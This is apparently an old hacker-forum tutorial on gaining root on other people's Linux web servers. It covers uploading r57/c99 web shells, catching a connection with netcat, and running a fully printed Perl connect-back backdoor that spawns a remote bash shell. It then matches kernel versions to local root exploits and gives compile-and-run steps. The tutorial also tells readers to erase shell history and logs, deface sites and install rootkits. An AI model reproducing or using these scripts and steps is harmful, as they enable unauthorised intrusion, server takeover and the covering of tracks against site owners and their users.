#Trace: Linux 提权教程。 参考视频:
[1]http://rapidshare.com/files/109733291/Linux_Rooting.rar.html
[2]http://files.ge/file/401011/vidzeo-tar-gz.html
Today, I have decided to put up a tutorial for both newbies and pwners! and just reference for all of us. This is a dream of every h4k3r, to get free root access. if you haven't got one, then try harder, because you are not a h4ck3r then.
Hacking is not about dumping database using prescripted materials by another hacker, a good hacker does write his own script and use it to the maximum extent to achieve whatever his/her project was, and this is refers to as priv8 script.
You have to get access to restricted access before you can say, I'm a h4xor or so! Today, I will give you brief tutorial on how to get your first root access!
Ok enough.
requirement: shell http://unsecure-site.com/r57.php http://unsecured-site.com/c99.php
This mean you have downloaded shell on the site.
You will need, swiss-army weapon (Don't travel to swiss yet, this is netcat) and it can be downloaded on internet free of charge
you will also need a backconnect script. I provided one for your use here!
so let's roll on.
Shell Access on a website is the first thing you will need.
You can get this access, by doing uploading of shell to any vulnerable website using the following method: LFI = Local File Inclusion RFI = Remote File Inclusion SQL Injection
I will not go to details on the above. I will post extensive tutorial on those later, but I think the forum must have some nice tuto on those, do some search. :P
NOW, get swiss knife weapon, AKA netcat
http://www.vulnwatch.org/netcat/nc111nt.zip
If you have an antivirus that auto deletes infected files or virus i would suggest disabling it as some av's will detect netcat as a hacktool or remote admin tool. it is not a virus.
Downloaded? good on window box, double click it and it will bring up a command prompt, then type
-vv -l -n -p <porttoconnecton>
Now backconnet I preffer to use one thats not in the shell because i find that those back connects work shitty so i will provide you with one that i use. Very simple to use just save as "bc.pl" then upload to server and end execute.
Code: perl bc.pl <youriphere> <porttoconnecton> Code: PERL
#!/usr/bin/perl use IO::Socket; # Priv8 ** Priv8 ** Priv8 # s4t3ll1t3 SABOTAGE Connect Back Shell # code by:s4t3ll1t3 # We Are :s4t3ll1t3-C0d3r-NT-\x90 # Email:s4t3ll1t3@ihsteam.com # #s4t3ll1t3@SlackwareLinux:/home/programing$ perl dc.pl #--== ConnectBack Backdoor Shell vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==-- # #Usage: dc.pl [Host] [Port] # #Ex: dc.pl 127.0.0.1 2121 #s4t3ll1t3@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121 #--== ConnectBack Backdoor Shell vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==-- # #[*] Resolving HostName #[*] Connecting... 127.0.0.1 #[*] Spawning Shell #[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121 #listening on [any] 2121 ... #connect to [127.0.0.1] from localhost [127.0.0.1] 32769 #--== ConnectBack Backdoor vs 1.0 by s4t3ll1t3 of s4t3ll1t3 SABOTAGE ==-- # #--==Systeminfo==-- #Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux # #--==Userinfo==-- #uid=1001(lamer) gid=100(users) groups=100(users) # #--==Directory==-- #/root # #--==Shell==-- # $system = '/bin/bash'; $ARGC=@ARGV; print "IHS BACK-CONNECT BACKDOOR\n\n"; if ($ARGC!=2) { print "Usage: $0 [Host] [Port] \n\n"; die "Ex: $0 127.0.0.1 2121 \n"; } use Socket; use FileHandle; socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n"; connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n"; print "[*] Resolving HostName\n"; print "[*] Connecting... $ARGV[0] \n"; print "[*] Spawning Shell \n"; print "[*] Connected to remote host \n"; SOCKET->autoflush(); open(STDIN, ">&SOCKET"); open(STDOUT,">&SOCKET"); open(STDERR,">&SOCKET"); print "IHS BACK-CONNECT BACKDOOR \n\n"; system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo; echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- "); system($system); #EOF
copy the above to a file and name it bc.pl upload it to server, you are done.
**Note that if you are running a router or wireless on multiple ips set by your dhcp you might have to forward the <porttoconnecton> to what ever the ip of your computer is. You can check this by opening command prompt and typing ipconfig you should get an ip that looks similar to 192.168.1.100 which is the ip to forward to. If you are unsure about how to forward your port check out this site and find your router model.
http://portforward.com/routers.htm
Now back to netcat, type the following command.
-vv -l -n -p 443
for this tutorial we will connect on port 4343. Hit enter and it should start listening for a connection.
remember you had downloaded bc.pl. on the server, now conncet it to you netcat with the following command perl bc.pl <yourip> 443
Check your netcat, it should be connected giving you details info about the box.
i like to do this first to know the kinda exploit u will use. uname -a;id Once executed you will see something probably similar to
Code: Linux alexandra.adm24.de 2.6.8-2-686-smp #1 SMP Tue Aug 16 12:08:30 UTC 2005 i686 GNU/Linux uid=33(www-data) gid=33(www-data) groups=33(www-data)
The important information here that you want is the OS & Kernel version which is 2.6.8-2 and you can see the last update of it was in 2005 so it's fairly old. which is a good thing for us.
below here are kernel that can be rooted, just general ideal. i have a link to the kernels and their exploit, check it out
http://www.molotovbitch.org/localroot/
Code: 2.2 -> ptrace 2.4.17 -> newlocal, kmod, uselib24 2.4.18 -> brk, brk2, newlocal, kmod 2.4.19 -> brk, brk2, newlocal, kmod 2.4.20 -> ptrace, kmod, ptrace-kmod, brk, brk2 2.4.21 -> brk, brk2, ptrace, ptrace-kmod 2.4.22 -> brk, brk2, ptrace, ptrace-kmod 2.4.22-10 -> loginx 2.4.23 -> mremap_pte 2.4.24 -> mremap_pte, uselib24 2.4.25-1 -> uselib24 2.4.27 -> uselib24 2.6.2 -> mremap_pte, krad, h00lyshit 2.6.5 -> krad, krad2, h00lyshit 2.6.6 -> krad, krad2, h00lyshit 2.6.7 -> krad, krad2, h00lyshit 2.6.8 -> krad, krad2, h00lyshit 2.6.8-5 -> krad2, h00lyshit 2.6.9 -> krad, krad2, h00lyshit 2.6.9-34 -> r00t, h00lyshit 2.6.10 -> krad, krad2, h00lyshit 2.6.13 -> raptor, raptor2, h0llyshit, prctl 2.6.14 -> raptor, raptor2, h0llyshit, prctl 2.6.15 -> raptor, raptor2, h0llyshit, prctl 2.6.16 -> raptor, raptor2, h0llyshit, prctl 2.6.23 - 2.6.24 -> diane_lane_******_hard.c 2.6.17 - 2.6.24-1 -> jessica_biel_naked_in_my_bed.c
you can get it there update version on this site. http://www.molotovbitch.org/localroot/
Once you have found the Kernel ver. of the server you are about to root you need to find the Local Root Exploit for that kernel which you can find with google using the list above. or just go here to make it easier!
http://www.molotovbitch.org/localroot/
Now check which exploit goes for which kernel, ok? you found it. good, before doing anything on this server, be as smart as possible, type this command
unset HISTFILE ; unset HISTSIZE ; export HISTFILESIZE=0 ; this simply try to help your ass to to be traced by the histroy of your commands
Now comply and root.
To Compile your scripts go to your shell that you have spawned with netcat and follow this instructions.
Code: gcc xpl.c -o xpl This will compile your xpl.c to a file named xpl.
From here now all you have to do is run your exploit which can be done by simply typing in your netcat connection
Code: ./xpl
It should execute the exploit file which you have just compiled and give you root
then type id; whoami
it should say, root, your are root
Congratulations! then remember me in your dream for posting this for your use.
remember, all exploits are not just compile and execute, some requires some little works eg h0llyshit. it require a big file to work.
example of h00lyshit here
before the compile) For the h00lyshit we must type: gcc h00lyshit.c -o h00lyshit then you get h00lyshit. The command to run this exploit is: ./h00lyshit <very big file on the disk> We need a very big file on the disk in order to run successfully and to get root. We must create a big file in /tmp or into another writable folder. The command is: dd if=/dev/urandom of=largefile count=2M where largefile is the filename. please wait 2-3 minutes to get the file created! If this command fails we can try: dd if=/dev/zero of=/tmp/largefile count=102400 bs=1024 Now we can procced to the last step. We can run the exploit by typing: ./h00lyshit largefile or ./h00lyshit /tmp/largefile (If we are in a different writable folder and the largefile is created in /tmp) If there are not running errors (maybe the kernel is patched or is something wrong with exploit run or large file) we will get root To check if we got root: id or whoami If it says root we got root! Now we can deface/mass deface all the sites of the server or to setup a rootkit (e.g. SSHDoor) and to take ssh/telnet shell access to the server. We must erase all logs in order to be safe with a log cleaner. A good cleaner for this job is the MIG Log Cleaner. clean your tracks, never leave them uncleaned!
This tutorial is written by me, siteprojects for more hands on training you can join me on my irc at irc.unixreal.net #siteprojects
I have provided some server for training.. so dont worry.
written by siteprojects and credit should be given to those who deserve it.
You have permission to post in another forum like always, but do not forget to give credit. like I say, join irc.unixreal.net #siteprojects on details on how to get box rooted, LFI RFI SQL etc.
N jooooooooooooooy
Posted by siteprojects
|